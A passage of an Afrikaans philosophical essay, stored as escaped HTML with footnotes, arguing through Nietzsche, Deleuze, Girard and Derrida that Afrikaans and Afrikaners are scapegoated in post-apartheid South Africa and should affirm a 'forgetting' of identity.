\u2019n kwasi-Vastelandse siening van kultuur herhaal. (Ek laat hier die sogenaamde Afrikanistiese kultuursiening buite rekening omdat dit meer onlangs na vore gekom het en na my mening nie besonder afwyk van sekere fundamenteel Westerse konsepte nie.) \u2019n Estetiese betrokkenheid met die taal of die landskap mag vanuit die gesonde verstand-siening met sy klem op operasionele kwessies en transnasionale kommunikasie, opvoedkundige opheffing, ens, gewoon \u201cnasionalisties\u201d of selfs fascisties voorkom. Dog die teenoorgestelde is waar wanneer so \u2019n betrokkenheid vanuit die veelheid van Vastelandse tradisies soos rasionalisme, dialektisisme, of die verskeie vorme van geradikaliseerde vorme van taalkundige strukturalisme en Nietzscheanisme wat ons in die n\u00e1-oorlogse Europa vind, beskou word. Deleuze, om maar een voorbeeld te noem, het inderdaad minderheidstaal teenoor di\u00e9 van die meerderheid gepriviligeer. Hy siteer onder andere die re\u00ebl van Proust, \u201c<em>Les beaux livres sont \u00e9crits dans une sorte de langue \u00e9trang\u00e8re<\/em>\u201d \u2014 \u201cmooi boeke word in \u2019n soort vreemde taal geskryf\u201d <a class=\"simple-footnote\" title=\"Deleuze, Gilles. Superpositions. Parys: Minuit, 1979, bl 109.\" id=\"return-note-1-12\" href=\"#note-1-12\"><sup>12<\/sup><\/a>. In dieselfde trant praat hy van \u201cetnos, die minderheidagtige, die vluglyn binne die struktuur, die anti-historiese element binne die Geskiedenis\u201d. <a class=\"simple-footnote\" title=\"ibid, bl 127.\" id=\"return-note-1-13\" href=\"#note-1-13\"><sup>13<\/sup><\/a> Afrikaans en alles wat daarmee saamhang, dit het ons ook met die Waarheidskommissie gesien, is toenemend die ongewenste, steurende etniese element wat die samehang van die imperiale Engel se geskiedenis beduiwel. In die sogenaamde nuwe Suid-Afrika word ons gesien as behorende tot \u2019n voor-geskiedenis, of liefs \u2019n geskiedenis wat vergeet behoort te word ter wille van die heersersverhaal van swart lyding en bevryding in Engels.<\/p>\n<p>Britse gesonde verstand vrywaar \u2019n mens boonop nie van rassisme en fascisme, veral daardie besondere vari\u00ebteit waarna ek vroe\u00ebr verwys het deur gebruik van die ietwat oudmodiese term, \u201cjingo\u00efsme\u201d, nie. By \u2019n onlangse konferensie aan die Oxford Universiteit met as titel \u201cSouth Africa 1895-1921: test of Empire\u201d is die vormingsjare van die huidige semi-nywerheidsland wat ons as Suid-Afrika ken, onder die loep geneem. Die mees onlangse navorsing oor die denke van Lord Milner wat die opvoedkundige beleid met die vorige eeuwending bepaal het en \u2019n versnelde vorm van verengelsing en taalverdrukking ingestel het in die naam van vooruitgang en ontwikkeling \u2014 daardie twee gesonde verstand-ideale \u2014 toon duidelik \u2019n byna boosaardige vorm van Angel-Saksiese heerssugtigheid waarbinne die idee van \u2019n \u201cheersersras\u201d nie afwesig is nie. Die intellektuele verwarring van ons huidige regering, verskeur tussen Afrikanistiese ideale en die sogenaamde ekonomiese werklikhede wat deur oligopolistiese, koloniale belange aan hom opgedring word, mag wel \u2019n mutante Milnerisme toelaat in die naam van Afrikabevryding, wat selfs, indien dit te ver gevoer word, kan eindig in een of ander chiliastiese, geradikaliseerde optrede, hetsy deur \u2019n Kulturele Rewolusie, hetsy <em>umahaa<\/em> of statsosialisme, of die herinstelling van konsentrasiekampe.<\/p>\n<p>Ek is bewus daarvan dat ek hier sinspeel op sekere van die magtige simbole van wat bekend staan as \u201cdenke van regs\u201d binne ons konteks. Dit gaan hier egter nie om opsweping nie, maar om besinning oor die situasie waarin Afrikaans hom tans bevind. Ek durf die moontlikheid van \u2019n ekstreme terugkeer na Anglosentriese \u201csocial engineering\u201d en repressie noem, juis omdat die aktivistiese, moralistiese lesing van die geskiedenis wat onlangs in Suid-Afrika gewild geword het, so kommerwekkend is. Dit is \u2019n \u201cgeskiedenis van die armes\u201d wat soek na \u2019n enkele oorsaak vir armoede en lyding. Merendeels word dit alles geassosieer met die konsep \u201capartheid\u201d waarop ek nie nou wil ingaan nie. <a class=\"simple-footnote\" title=\"Vergelyk sekere van my opmerkings in Om die Waarheidskommissie te vergeet aangaande die ahistoriese aard van hierdie begrip.\" id=\"return-note-1-14\" href=\"#note-1-14\"><sup>14<\/sup><\/a> In soverre as wat die Afrikaner en Afrikaans as \u2019t ware daarvoor verantwoordelik gehou word dat swart Suid-Afrikaners en by uitbreiding Afrikane suid van die ewenaar nie oor dieselfde vlak van opvoeding en \u2019n gelykstaande lewenstandaard as die burgers van Switserland beskik nie, het ons te make met die problematiek van die sondebok waarby kwessies soos taal en identiteit wel regstreeks betrokke is. Joodse spekulante is ook verantwoordelik gehou vir die Duitse hiperinflasie tydens die Weimar-republiek, en ons weet waarop dit uitgeloop het.<\/p>\n<p>Voordat ek uitwei oor die opvatting van die sondebok, is dit nodig om te probeer verstaan wat \u2019n stereotipe of \u2019n karikatuur soos daar van die Afrikaner en sy politieke betrokkenheid in Suid-Afrika gemaak is, behels. Daar is geen \u201cidentiteit\u201d wat so sterk is soos di\u00e9 van die \u201cdumb Dutchman\u201d nie, daardie frase wat vanaf die Engelse skoolgronde in Suid-Afrika sy weg gevind het tot die voorblad van <em>Time<\/em> of die gesanik van Europese TV-nuusaanbieders. Veral tydens my verblyf in Frankryk het ek onder die indruk gekom dat \u2019n mens enigiets oor Suid-Afrika, Afrikaners, Afrikaans, ens, kan kwytraak sonder dat dit in die minste aan een of ander perk of kriterium onderworpe is. Ons is fasciste, mensvreters, moordenaars, barbare, ontaarde wit mense, en wat nog. Ek kan onthou dat die wildbewaarders wat olifante uitdun in die Kruger-wildtuin op televisie voorgehou is as irrasionele wreedaards wat doodmaak omdat dit in hul eie aard is as vermoedelik wit Afrikaners. Vir diegene wat nog gewonder het oor hul identiteit in Afrikaans, is daar reeds \u2019n klaargemaakte een, \u2019n \u201cglobale identiteit\u201d, wat waarskynlik deur miljarde mense op hierdie planeet as buite bespreking geag word.<\/p>\n<p>Nieteenstaande die besondere verhouding wat daar tussen Afrikaans en die landskap bestaan, en die geworteldheid waarvan daar hierbo melding gemaak is, is dit tans nodig om oor te gaan tot \u2019n radikale vorm van vergeetagtigheid. By my definisie van Afrikanerskap onlangs, as synde \u201ciemand wat van melktert of koeksisters hou\u201d, wil ek voeg: \u201ciemand wat sterk genoeg is om sy identiteit te vergeet.\u201d Veral ook sy \u201cglobale identiteit\u201d.<\/p>\n<p>Sommiges sal hierin \u2019n Nietzscheaanse definisie van Afrikanerskap sien, en met reg. Nietzsche voel hom as \u2019t ware \u2019n vreemdeling tussen die Duitsers, hoewel niemand waarskynlik beter die Duitse taal kon gebruik as juis hy nie. As veeltalige Europe\u00ebr sien hy neer op die Duitsers en, verwysende na hul kleinlike nasionalisme, chauvinisme, anti-Semitisme, verwys hy na \u201cdiese kleinen Benebelungen des Deutschen Geistes und Gewissens\u201d <a class=\"simple-footnote\" title=\"Nietzsche, Friedrich. S\u00e4mtliche Werke: Jenseits von Gute und B\u00ef\u00bf\u00bdse. Stuttgart: Alfred Kr\u00f6ner Verlag, 1964, bl 183.\" id=\"return-note-1-15\" href=\"#note-1-15\"><sup>15<\/sup><\/a> [\u201cdie klein bedwelminge van die Duitse gees en die Duitse gewete\u201d]. In sy skerp onafhanklike kyk na sy vaderland \u2014 \u2019n \u201cviviseksie\u201d noem hy dit \u2014 is daar vir ons \u2019n les. Het dit nie tyd geword dat ook ons die skimme van die verlede van ons afwerp en opnuut die vraag vra: wat is Afrikaans, wat beteken dit nie?<\/p>\n<p>Nietzsche neem verder die Duitsers kwalik dat hulle oor \u201cgeen hede\u201d beskik nie. Hoeveel te meer is dit nie op ons van toepassing nie! As daar een aspek is van die huidige Suid-Afrika wat uitstaan, is dit die gehamer op die \u2014 sy dit dan onlangse \u2014 verlede. Elkeen kan homself moreel regverdig en sy vyand as demoon verdoem deur sy visier in te stel op die regte jaartal, of dit nou 1899 of 1976 is. Die selektiewe onthou van die verlede is in ons maatskappy tot \u2019n kuns verhef, by gebrek aan kuns in die ware sin van die woord. Dit is nodig om ons teen di\u00e9 dialektiek te verset, deur eenvoudig te vergeet, deur onskuld teen skuld te stel, beaming teen ontkenning, die amorele teen die morele, nie-identiteit teenoor identiteit.<\/p>\n<p>Die intensiteit van die gevoel teen Afrikaans en Afrikaners is nie bloot te verklaar met verwysing na die buitelandse korrespondent wat sy propaganda die w\u00eareld instuur waar dit klakkeloos deur die hordes as evangelie opgeneem word nie. Meer en meer kom dit voor asof anti-Afrikaansheid, of dan \u201cBoerehaat\u201d soos dit tradisioneel bekend staan, nie net vormlik nie maar ook konseptueel verwant is aan anti-Semitisme. Toevallig is Suid-Afrika en Israel tot onlangs in die internasionale media oor dieselfde kam geskeer, maar dit gaan veel dieper, want beide Jode en Afrikaners het \u2019n kollektiewe aartsonde gepleeg jeens die Weste. In die geval van Jode is dit sekerlik die moord op Christus, asook hul andersheid, hul eksklusiwiteit. Wat Afrikaners en hul voorgangers, die Boere, betref, is dit eerder hul vergeetagtigheid, die feit dat hulle vergeet het hoe om korrek en algemeen beskaaf Nederlands te praat, en in \u2019n sekere sin hul rug gekeer het op die Westerse beskawing soos wat De Kiewiet beweer. Vergun my weer eens \u2019n aanhaling uit my gunstelingboek oor die Boere, De Kiewiet se <em>History of South Africa<\/em>,<\/p>\n<blockquote>\n<p>Men so widely scattered as they were lost the gregarious habit of their forefathers in Europe. They built few villages. On the great farms each man fled the tyranny of his neighbour\u2019s smoke. It followed that their communal life was loosely organized. They came together when compelled by danger or crisis. In the face of the native population their sense of race and fellowship was exceedingly keen. But their co-operation was not continuous and sustained. The habits of their social life were like the discipline of their commados. It was the sum of individual willingness; at its best it was excellent, at its worst it destroyed the commando. <a class=\"simple-footnote\" title=\"op cit, bl 19.\" id=\"return-note-1-16\" href=\"#note-1-16\"><sup>16<\/sup><\/a><\/p>\n<\/blockquote>\n<p>In \u2019n sekere sin was die Boer dus \u2019n \u201csoewereine individu\u201d wat staatloos gelewe het, en bloot die gemeenskap opgesoek het as daar sprake was van gevaar. Die beeld van nomades wat al verder verwyder raak van hul oorsprong in die volke van Europa is by uitstek die bydrae van De Kiewiet tot die SA geskiedskrywing, soos ons reeds gesien het. Op \u2019n baie meer banale vlak kry dit tot vandag toe en veral in die internasionale media uitdrukking in die opvatting dat Afrikaners \u2019n verworde wit \u201cstam\u201d is en, let wel, geen \u201cvolk\u201d nie. Die vergeet van \u2019n Europese nasionale identiteit is een van die ernstigste aanklagte teen Afrikaners. Dit maak hul minder beskaafd, nader aan barbare, minder moreel.<\/p>\n<p>Aan die ander kant staan die Afrikaner nogtans nader aan die Weste as die Afrikaan wat afkomstig is uit \u2019n soort Utopie wat nog nie bederf is deur die beskawing nie. In die negentiende eeu het hierdie idee berus in die Rousseauistiese opvatting van die \u201cedele barbaar\u201d; tans vind ons dit terug in die algemeen gangbare geloof dat die lewenstandaard en kwaliteit van lewe van Afrikane veel beter was voor die koms van Europe\u00ebrs na Suid-Afrika. Trouens, die Groot Trek het die utopiese ruimte van die binneland soos dit gesien is vanuit die Britse sendelingparadigma, besoedel. Die Afrikaner bevind hom dus in \u2019n tussengebied tussen Europa en Afrika, en hy beskik n\u00f3g oor beskawing n\u00f3g oor die morele ongeskondenheid van die Afrikaan.<\/p>\n<p>Die hele kwasi-Calvinistiese debat wat daar deesdae romdom \u201cskuld\u201d gevoer word, gaan ons nie eintlik aan nie. Die strik waarin sekere Afrikaanse skrywers trap om skuld of aandadigheid aan die sondige verlede te bely, hoe hulle ouers die woord \u201ckaffer\u201d in die huis gebruik het, die outas agter die kraalmuur met sambokke aangerand het, ens, bewys net weer hoe sterk die globale Afrikaneridentiteit is, dat dit \u2019n mens oproep tot belydenis, veral as \u2019n New Yorkse uitgewer sy tjekboek uithaal en s\u00ea: \u201cTell me how dumb ya are, Dutchman.\u201d Glucksmann het reeds gewys op hierdie neiging by die Weste om geen morele skuld aan Afrikane toe te ken nie, en slegs aan die stiefkinders van die Weste, die Afrikaners, alhoewel sy gevolgtrekking dat die Westerling homself in die blanke Suid-Afrikaner weerspie\u00ebl sien, nie vir my opgaan nie. <a class=\"simple-footnote\" title=\"Glucksmann, Andr\u00e9 en Wolton, Thierry. Silence on tue. Parys: Grasset, 1986, bll 23-24.\" id=\"return-note-1-17\" href=\"#note-1-17\"><sup>17<\/sup><\/a> In die mensdom se obsessie met ras, wat sedert Cuvier en Darwin dateer, is daar voortdurend nuwe vorme van etniese denke en sondeboksoekery wat na vore kom. Teenoor die \u201ceenvoudige\u201d Europese rassisme van die verlede, vind ons nou die oordrag na kwesbare sosiale groepe van die rassekompleks via kulturele of ekonomiese diskriminasie. Niemand het nog ras as konsep afgesweer nie, allermins ons huidige heersers, maar die skuld of die merk van Ka\u00efn het van een groep na \u2019n ander verskuif.<\/p>\n<p>Die idee van die sondebok is breedvoerig bespreek deur Ren\u00e9 Girard. <a class=\"simple-footnote\" title=\"Girard, Ren\u00e9. Le bouc \u00e9missaire. Parys: Grasset, 1982.\" id=\"return-note-1-18\" href=\"#note-1-18\"><sup>18<\/sup><\/a> Die soort optrede wat uitloop op die soek na \u2019n sondebok is per definisie di\u00e9 van \u2019n heksejag. In sy meer anti-Afrikaanse momente bantwoord die Waarheids- en Versoeningskommissie geheel en al aan hierdie definisie. Tydens die Pes in Europa gedurende die Middeleeue is groot groepe Jode vermoor as sou hulle verantwoordelik gewees het vir die ellende. Die demagogiese begrip \u201capartheid\u201d is \u2019n soort opvangbak vir alle maatskaplike euwels wat in Suid-Afrika en selfs in Suider-Afrika werksaam is, vanaf armoede, gebrek aan opvoeding, werkloosheid, tuberkulose, tot Vigs, stamgeweld, misdaad, noem maar op. Dit is nie soveel verskillend van die pes nie, en die werklike oorsake van hierdie toestande is aan ons ewe duister as wat mikrobiologiese verskynsels aan die stadsbewoners van die Middeleeue was. Interessant is dat daar gewoonlik \u2019n \u201cteken\u201d of eienskap kleef aan die sondebok wat hom uitsonder van die meerderheid aan wie hy kwaad doen of gedoen het. <a class=\"simple-footnote\" title=\"ibid, bll 30-31.\" id=\"return-note-1-19\" href=\"#note-1-19\"><sup>19<\/sup><\/a> Belangrik is dat die slagoffer van vervolging deur die meerderheid nie gekies word na aanleiding van die misdaad \u2014 werklik of verbeeld \u2014 wat hy gepleeg het nie, maar op grond van sy slagofferteken wat op stereotipes berus. Stereotipering hou daarom altyd die gevaar van vervolging in. Slagoffertekens is dikwels ook \u201cverskille\u201d, \u2019n \u201candersheid\u201d wat ook kultureel of godsdienstig kan wees. \u2019n Voorbeeld van \u2019n slagoffer wat deur Girard genoem word is Oedipus in die stuk deur Sophocles.<\/p>\n<blockquote>\n<p>Plus un individu poss\u00e8de de signes victimaires, plus il a de chances de\u2019attirer la foudre sur sa t\u00eate. L\u2019infirmit\u00e9 d\u2019Oedipe, son pass\u00e9 d\u2019enfant expos\u00e9, sa situation d\u2019\u00e9tranger, de parvenu, de roi, font de lui un v\u00e9ritable conglom\u00e9rat de signes victimaires. <a class=\"simple-footnote\" title=\"ibid, bl 39.\" id=\"return-note-1-20\" href=\"#note-1-20\"><sup>20<\/sup><\/a><\/p>\n<p>[Hoe meer slagoffertekens \u2019n individu het, hoe groter is die kans dat hy die ongeluk oor hom kan bring. Die gebrek van Oedipus, sy verlede as weggooikind, sy status as buitelander, as parvenu, as koning, maak van hom \u2019n ware konglomeraat van slagoffertekens.]<\/p>\n<\/blockquote>\n<p>In baie opsigte is Afrikaans \u2019n unieke taal op die vasteland van Afrika, wat die sprekers daarvan ook uniek maak, \u2019n eienaardige minderheid in \u2019n w\u00eareld wat oorheers word deur groot imperiale tale: Mandaryns in die Ooste, Engels in die Weste. Dit is \u2019n ongemaklike posisie om \u2019n lid van \u2019n eienaardige minderheid te wees in \u2019n omgewing of op \u2019n vasteland wat gedurig gebuk gaan onder maatskaplike en natuurrampe, oorlo\u00eb, opstande, terreur, misdaad en die verspreiding van aansteeklike siektes soos Vigs en malaria. Soos die Jode, is alle Afrikaners of Afrikaanssprekendes uiters kwesbaar as synde \u2019n \u201ckonglomeraat van slagoffertekens\u201d, en moet hulle byvoorbaat die konsentrasiekamp anderkant die bult sien sodra aantygings van kollektiewe skuld gemaak word of etniese stereotiperingsveldtogte via die massamedia gevoer word.<\/p>\n<p>Ek wil vir \u2019n oomblik stilstaan by die idee van \u2019n tussengebied, \u2019n niemandsland, die uitgestrektheid van die landskap, \u2019n soort Karoo van die identiteit. Daar is \u2019n woord in Frans vir \u201cgebied\u201d of \u201comstreke\u201d wat reeds ontgin is om die aarselende betekenis weer te gee waarna ek soek, die woord \u201cparages\u201d.<\/p>\n<blockquote>\n<p>Parages: \u00e0 ce seul mot confions ce qui situe, tout pr\u00e8s ou de loin, le double mouvement d\u2019approche et d\u2019\u00e9loignement, souvent le m\u00eame pas, singuli\u00e8rement divis\u00e9, plus vieux et plus jeune que lui-m\u00eame, autre toujours, au bord de l\u2019\u00e9v\u00e9nement, quand il arrive <em>et<\/em> n\u2019arrive pas, infiniment distant \u00e0 l\u2019approche de l\u2019autre rive. <a class=\"simple-footnote\" title=\"Derrida, Jacques. Parages. Parys: Galil\u00e9e, 1986, bl 15.\" id=\"return-note-1-21\" href=\"#note-1-21\"><sup>21<\/sup><\/a><\/p>\n<p>[Gebied: aan hierdie enkele woord wil ons toeken dit wat, hier naby of daar ver, die dubbele beweging van naderkoms en wegtrek omvat, eiesoortiglik verdeel, ouer en jonger as sigself, altyd anders, aan die rand van die gebeurtenis, as dit arriveer \u00e9n nie arriveer nie, oneindig ver verwyder wanneer die oorkantste oewer benader word.]<\/p>\n<\/blockquote>\n<p>As hierdie aanhaling klink soos \u2019n dekonstruksie van die Groot Trek, is dit nie toevallig nie: dit is afkomstig uit \u2019n teks van Jacques Derrida oor die werk van Maurice Blanchot. Enkele bladsye later tydens \u2019n ontleding van Blanchot se boek <em>Le pas au-del\u00e0<\/em> (\u201cDie tree na anderkant\u201d), is daar \u2019n eg Nietzscheaanse formulering van dieselfde konsep van \u2019n aarselende oorgang:<\/p>\n<blockquote>\n<p>Il y a <em>toujours deux<\/em> pas. L\u2019un dans l\u2019autre mais sans inclusion possible, l\u2019un affectant l\u2019autre imm\u00e9diatement mais \u00e0 le franchir en s\u2019eloignant de lui. Toujours deux pas, franchissant jusqu\u2019\u00e0 leur n\u00e9gation, selon le retour \u00e9ternel de la transgression passive et de l\u2019affirmation r\u00e9p\u00e9t\u00e9e. <a class=\"simple-footnote\" title=\"ibid, bl 59.\" id=\"return-note-1-22\" href=\"#note-1-22\"><sup>22<\/sup><\/a><\/p>\n<p>[Daar is <em>altyd twee<\/em> tre\u00eb. Die een voetspoor in die ander maar sonder moontlike insluiting, die een wat die ander onmiddellik affekteer maar deur \u2019n tree telkens verder weg te gee. Altyd twee tre\u00eb, te gee tot by hul wedersydse ontkenning, volgens die ewige wederkeer van passiewe oortreding en herhalende bevestiging.]<\/p>\n<\/blockquote>\n<p>Die huiwerende situasie van Afrikaans, gevang in sy taalgebied in Afrika maar gedurig intellektueel in pas met Europa, is vir my nie anders as die beskrewe beweging nie. Ook die posisie van Afrikaans, in sy opkoms en verval as amptelike taal, die skynbaar fatale dans met mag van die pas afgelope veertig jaar of so, kan gesien word as \u2019n betreding van di\u00e9 unieke tussengebied waar die bordjies telkens verhang word. Taalbeweging, taaltrek, taaldraadtrek, dit is soveel valle van die dobbelsteen van die ewige wederkeer. Maar betreding dui reeds op die begaan van \u2019n oortreding, om die ander se taalgebied as \u2019t ware te kom bevuil met jou po\u00ebsie, jou letterkunde, jou radio- of televisieprogram, jou advertensie, jou preek of draakstekery.<\/p>\n<p>Die eindelose herkolonisering van die Afrikaner, nou in die naam van imperiale uitbreiding, dan weer in die naam van postkoloniale ontwikkeling, is inderdaad \u2019n ervaring van die ewige wederkeer. Di\u00e9 heen-en-weer beweging wat nie net die herhaalde aanslae van die geskiedenis omvat nie, maar ook die uitspeel van Afrikaans in sy verhouding tot die Suid-Afrikaanse landskap in die breedste moontlike sin, word vir my mooi saamgevat deur Deleuze se koeplet deterritorialisering\/reterritorialisering. Afrikaans is letterlik \u2019n gedeterritorialiseerde Nederlands, wat op sy beurt gereterritorialiseer word deur Engels en die pre-koloniale Afrika-utopie.<\/p>\n<p>\u2019n Mens hoor dikwels dat Afrikaans onder die vorige bewind \u201cbevoorreg\u201d is, en nou gestraf moet word daarvoor. Hierdie denke is eienaardig, maar op \u2019n manier gee die tussengebied wat Afrikaans beklee hom tog \u2019n verhewe en daarom bevoorregte posisie. In \u2019n sekere sin is die Suid-Afrikaanse ervaring n\u00f3g Europees, n\u00f3g van Afrika. Dit behels drie eeue van deterritorialisering, van vergeet van \u00e9n die Europese identiteit \u00e9n die Afrika-identiteit. Ek word ge\u00efntrigeer deur die volgende opmerking van \u2019n sekere historikus wat allermins Afrikaans of die Afrikaner goedgesind is, en wat waarskynlik geen erg sou h\u00ea aan die verdwyning van Afrikaans as taal nie. Verwysende na die Ho\u00ebveld, meen hy:<\/p>\n<blockquote>\n<p>These hot, dry and expansive plains of the subcontinent provide the country with its most characteristic landscape, and a distinctive terminology which singles out for special attention any geomorphological feature which so much as hints at either height or water. Koppie, krans, pan, platteland, rand, sloot, spruit, vlakte, and vlei \u2014 are all Afrikaans words that defy easy translation and which have been incorporated holus-bolus into the vocabulary of all urban South Africans. They are quintessentially highveld words; words that give life to the ways in which one senses and experiences much of what it is to be South African &#8230; When an authentic South African identity eventually emerges from this troubled country it will, in large part, have come from painful experiences on the highveld. <a class=\"simple-footnote\" title=\"Van Onselen, Charles. The seed is mine. Kaapstad: David Philip, 1996, bll v-vi.\" id=\"return-note-1-23\" href=\"#note-1-23\"><sup>23<\/sup><\/a><\/p>\n<\/blockquote>\n<p>Die leser van Nietzsche kan nie anders as om hardop te skater oor die opvatting van \u201c\u2019n outentieke Suid-Afrikaanse identiteit nie\u201d, maar is dit nie \u2019n kraak in die mondering van die \u201cnasionale en internasionale lingua franca\u201d nie? Wat Van Onselen, die outeur van hierdie re\u00ebls nie besef nie, is dat die skoonheid van hierdie woorde \u2014 hierdie Afrikaanse woorde \u2014 nie uitvloei vanaf of selfs neig na \u2019n ware identiteit nie, maar vanuit \u2019n proses van vergeet, van swerf, van soeke na die horison van die tussengebied.<\/p>\n<p>Die verskil tussen Afrikaner-nasionalisme en Afrika-nasionalisme is een lettergreep, en albei hou aan ons \u2019n identiteit voor wat gefabriseer word uit herinnerde idealisme, Plato se proses van anamnese waar ons almal soos grotbewoners droom van die helder lig daarbuite wat ons nooit sal smaak nie omdat dit tot die ide\u00eble w\u00eareld behoort. Eerder as wat ons die identiteit nastreef wat deur die kultuurpolisie van die nuwe ou Suid-Afrika aan ons voorgehou word, behoort ons die proses van vergeet wat eie aan Afrikaans is, voort te sit. Ons behoort ons verlies aan \u2019n identiteit te bevestig of, in Nietzscheaanse terme, dit te beja.<\/p>\n<p>Om Afrikaans te beja sou onder meer behels om verby die taalmoraliteit en -moralisme te kyk. Soos Nietzsche dit stel:<\/p>\n<blockquote>\n<p>Die Moral, insofern sie verurteilt, an sich, nicht aus Hinsichten, R\u00fccksichten, Absichten des Lebens, ist ein spezifischer Irrtum, mit dem man kein Mitleiden haben soll, eine Degenerierten-Idiosynkrasie, die uns\u00e4glich viel Schaden gestiftet hat! &#8230; Wir anderen, wir Immoralisten, haben umgekehrt unser Herz weit gemacht f\u00fcr alle Art Vertstehn, Begreifen, <em>Guthei\u00dfen<\/em>. Wir verneinen nicht leicht, wir suchen unsre Ehre darin, <em>Bejahende<\/em> zu sein &#8230; <a class=\"simple-footnote\" title=\"Nietzsche, Friedrich. S\u00e4mtliche Werke: G\u00f6ttzend\u00e4mmerung. Stuttgart: Alfred Kr\u00f6ner Verlag, 1964, bl 106.\" id=\"return-note-1-24\" href=\"#note-1-24\"><sup>24<\/sup><\/a><\/p>\n<p>[Die moraal, sover dit op grond van homself veroordeel, en nie met verwysing na en waardering vir die doel van die lewe nie, is \u2019n spesifieke dwaling waarmee \u2019n mens geen simpatie behoort te h\u00ea nie, \u2019n idiosinkrasie van die gedegenereerdes wat ontsaglike skade veroorsaak het! &#8230; Ons ander, die immoraliste, het inteendeel ons harte oopgemaak vir elke soort verstaan, begrip, <em>goedkeuring<\/em>. Ons ontken nie maklik nie, ons soek na ons eer deur <em>bejaend<\/em> te wees.]<\/p>\n<\/blockquote>\n<p>Elders lees ons, met verwysing na die estetika:<\/p>\n<blockquote>\n<p>\u2018Das ist sch\u00f6n\u2019 is eine <em>Bejahung<\/em>. <a class=\"simple-footnote\" title=\"ibid, Der Wille zur Macht, bl 573.\" id=\"return-note-1-25\" href=\"#note-1-25\"><sup>25<\/sup><\/a><\/p>\n<p>[\u2018Dit is mooi\u2019 is \u2019n beja\u00efng.]<\/p>\n<\/blockquote>\n<p>Om Afrikaans te beja sou dus behels om in die eerste plek die taalmoraliteit af te sweer, die historiese rekeningkunde waar die taal nou promoveer tot \u201cbate\u201d, nou weer tot \u201clas\u201d. In hierdie dae van herinnering aan die onlangse verlede, gaan dit waarskynlik byna bomenslike moed verg om te vergeet, om aktief te vergeet ten einde die onskuld te verwerf waarsonder geen skepping moontlik is nie. Om aktief te vergeet beteken myns insiens op die minste \u2019n stellingname, \u2019n sekere strydvaardigheid en bereidheid om \u2019n standpunt te huldig. Dit gaan my te bowe dat soveel middelmatige persoonlikhede behorende tot ons openbare lewe soveel snert en onsinnighede oor Afrikaans en die kultuur in die algemeen kan kwytraak en skotvry daarvan afkom. Is daar geen skrywers meer in Afrikaans nie, kruip hulle almal onder die bed weg? Het ons geen denkers meer nie, of is hulle nog besig om hulself te herori\u00ebnteer sodat hulle gemaklik die oorgang vanaf die Broederbond na die Africanbond kan maak? Het Eug\u00e8ne Marais verniet \u201cWinternag\u201d geskryf en verniet teen die morfien gestry? Is ons so ge\u00efntimideer deur \u2019n spul opgepompte Europe\u00ebrs en Amerikaners wat geen snars van Suid-Afrika verstaan nie dat ons eers die rokspante van die Kappiekommando sal moet vind voordat ons durf antwoord op hul lomp bekookte beledigings?<\/p>\n<p>Is daar niemand wat identiteitloos genoeg is om ja te s\u00ea vir Afrikaans nie?<\/p>\n<div class=\"simple-footnotes\">\n<p class=\"notes\">Notes:<\/p>\n<ol>\n<li id=\"note-1-1\">Heidegger, Martin. <cite>Gelassenheit<\/cite>. Pfullingen: Verlag G\u00fcnther Neske, 1959. <a href=\"#return-note-1-1\">&#8617;<\/a><\/li>\n<li id=\"note-1-2\">Schoeman, Karel. Hierdie Lewe. Kaapstad: Human &amp; Rousseau, 1993. <a href=\"#return-note-1-2\">&#8617;<\/a><\/li>\n<li id=\"note-1-3\">Sien byvoorbeeld die beskrywing op bladsy 10, ibid., wat begin &#8220;Helder land, glansende silwergrys land wat voor my wegdrywe in die nag, waar ek verwonderd sien hoe elke tak van die harpuisbos glinster soos die digte spirale van sy blaartjies die skynsel van die lig weerkaats en elke rots dof gloei teen die rante &#8230;&#8221; <a href=\"#return-note-1-3\">&#8617;<\/a><\/li>\n<li id=\"note-1-4\">Ranci\u00e8re, Jacques. Courts voyages au pays du peuple. Parys: Ed. du Seuil, 1990. <a href=\"#return-note-1-4\">&#8617;<\/a><\/li>\n<li id=\"note-1-5\">ibid., bl. 7. <a href=\"#return-note-1-5\">&#8617;<\/a><\/li>\n<li id=\"note-1-6\">De Kiewiet, CW. A history of South Africa, social and economic. Londen: Oxford Univ Press, 1942. <a href=\"#return-note-1-6\">&#8617;<\/a><\/li>\n<li id=\"note-1-7\">ibid, bl 17. <a href=\"#return-note-1-7\">&#8617;<\/a><\/li>\n<li id=\"note-1-8\">Blum, Peter. &#8221;Rooinekke op Hermanus&#8221; in Steenbok tot poolsee. Kaapstad: Tafelberg, 1974. <a href=\"#return-note-1-8\">&#8617;<\/a><\/li>\n<li id=\"note-1-9\">P Vergilius Maro. Bucolica et georgica. Basingstoke en Londen: Macmillan, 1972, bll 1-3. <a href=\"#return-note-1-9\">&#8617;<\/a><\/li>\n<li id=\"note-1-10\">Kristeva, Julia. Etrangers \u00ef\u00bf\u00bd nous-m\u00ef\u00bf\u00bdmes. Parys: Fayard, 1988, bl 9. <a href=\"#return-note-1-10\">&#8617;<\/a><\/li>\n<li id=\"note-1-11\">Van Melle, J. Bart Nel. Pretoria: JL van Schaik, 1981. <a href=\"#return-note-1-11\">&#8617;<\/a><\/li>\n<li id=\"note-1-12\">Deleuze, Gilles. Superpositions. Parys: Minuit, 1979, bl 109. <a href=\"#return-note-1-12\">&#8617;<\/a><\/li>\n<li id=\"note-1-13\">ibid, bl 127. <a href=\"#return-note-1-13\">&#8617;<\/a><\/li>\n<li id=\"note-1-14\">Vergelyk sekere van my opmerkings in Om die Waarheidskommissie te vergeet aangaande die ahistoriese aard van hierdie begrip. <a href=\"#return-note-1-14\">&#8617;<\/a><\/li>\n<li id=\"note-1-15\">Nietzsche, Friedrich. S\u00e4mtliche Werke: Jenseits von Gute und B\u00ef\u00bf\u00bdse. Stuttgart: Alfred Kr\u00f6ner Verlag, 1964, bl 183. <a href=\"#return-note-1-15\">&#8617;<\/a><\/li>\n<li id=\"note-1-16\">op cit, bl 19. <a href=\"#return-note-1-16\">&#8617;<\/a><\/li>\n<li id=\"note-1-17\">Glucksmann, Andr\u00e9 en Wolton, Thierry. Silence on tue. Parys: Grasset, 1986, bll 23-24. <a href=\"#return-note-1-17\">&#8617;<\/a><\/li>\n<li id=\"note-1-18\">Girard, Ren\u00e9. Le bouc \u00e9missaire. Parys: Grasset, 1982. <a href=\"#return-note-1-18\">&#8617;<\/a><\/li>\n<li id=\"note-1-19\">ibid, bll 30-31. <a href=\"#return-note-1-19\">&#8617;<\/a><\/li>\n<li id=\"note-1-20\">ibid, bl 39. <a href=\"#return-note-1-20\">&#8617;<\/a><\/li>\n<li id=\"note-1-21\">Derrida, Jacques. <em>Parages<\/em>. 